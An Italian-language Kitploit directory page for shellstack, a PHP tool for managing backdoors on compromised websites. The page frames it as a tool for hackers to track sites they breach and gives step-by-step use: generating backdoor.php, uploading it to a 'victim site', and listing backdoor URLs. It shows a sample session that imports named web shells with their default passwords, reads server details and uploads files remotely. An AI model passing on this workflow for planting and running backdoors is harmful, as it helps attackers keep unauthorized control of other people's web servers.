Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
shellstack — Uno strumento basato su PHP che ti aiuta a gestire efficientemente tutti i tuoi siti web backdoorati. | Kitploit
Strumenti/GitHubGitHub/tuhinshubhra/shellstack
Generazione di PayloadSfruttamento di Applicazioni WebPost-ExploitStrumento di Accesso Remoto
GitHubtuhinshubhra/shellstack

shellstack

Uno strumento basato su PHP che ti aiuta a gestire efficientemente tutti i tuoi siti web backdoorati.

Vedi Repository
12663506 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ShellStack

Versione 1.0


ShellStack è uno strumento di gestione backdoor basato su PHP. Questo strumento è utile per "HACKER" che desiderano tenere traccia di ogni sito web che violano. Lo strumento genera un file backdoor che basta caricare sul sito e inserire l'URL della backdoor nel file shells.txt presente nella directory dello strumento.

Con ShellStack puoi

  • Importare Shell PHP
  • Ottenere Dettagli del Server
  • Caricare File dal Tuo Sistema usando il tuo terminale
  • E Soprattutto Puoi Gestire le Tue Backdoor in Modo Efficiente

Come Usare

  1. git clone https://github.com/Tuhinshubhra/shellstack
  2. cd shellstack
  3. php shellstack.php
  4. generatebd ed esci dallo strumento usando CTRL + C - Questo genererà un file backdoor nella stessa directory dello strumento in un file chiamato
backdoor.php
  • Carica il File Backdoor sul Sito Vittima
  • Copia l'URL della Backdoor e incollalo nel file shells.txt presente nella directory dello strumento e salvalo (Ogni backdoor è separata da una nuova riga)
  • php shellstack.php
  • Inserisci il Numero di Serie Assegnato alla Backdoor
  • Il resto è abbastanza autoesplicativo
  • Guarda il Video Qui: https://youtu.be/umk3ZNZ5Y1I

    Requisiti

    root@kitploit:~
    php
    curl 
    

    Esempio

    root@kitploit:~
    root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php
    
    
    ________________________________________________________________________________
    _______ _     _ _______               _______ _______ _______ _______ _     _
    |______ |_____| |______ |      |      |______    |    |_____| |       |____/
    ______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
    ________________________________________________________________________________
    
                        Simple Backdoor Management System
                        Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                        Shout Out: LulZSec India  
    ================================================================================
    
    
    
    List Of Backdoors:
    
    0. http://localhost/backdoor.php
    =============================================
    
    [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0
    
    [+] Shell Selected: http://localhost/backdoor.php
    [+] Validating Backdoor: Backdoor Found!
    
    List Of Actions
    ================
    [1] Import PHP Shells
    [2] Server Details
    [3] Remove Backdoor
    [4] Remote File Upload
    [5] Exit
    
    [#] Select Option(1|2|3|4|5):2
    
    [+] Server Info
    [i] Sending Request And Getting Response...
    [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
    [i] Server IP: 127.0.0.1
    
    
    Press Enter To Continue
    
    
    List Of Actions
    ================
    [1] Import PHP Shells
    [2] Server Details
    [3] Remove Backdoor
    [4] Remote File Upload
    [5] Exit
    
    [#] Select Option(1|2|3|4|5):1
    
    
    List Of Shells
    ===============
    [1] Dhanush shell {User & Pass : shellstack123}
    [2] B374K shell {Pass : shellstack123}
    [3] Kurama shell V.1.0 {Pass : red}
    [4] WSO shell {Pass : shellstack123}
    [5] MiNi shell {User & Pass : shellstack123}
    
    [#] Select Shell To Import(1-5):1
    
    
    [i] Importing Shell...
    [i] Sending Request And Getting Response...
    [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php
    
    
    Press Enter To Continue
    
    
    List Of Actions
    ================
    [1] Import PHP Shells
    [2] Server Details
    [3] Remove Backdoor
    [4] Remote File Upload
    [5] Exit
    
    [#] Select Option(1|2|3|4|5):5
    root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 
    
    

    Rilasci

    Versione 1.0 Del 14-06-2017

    Scarica lo strumento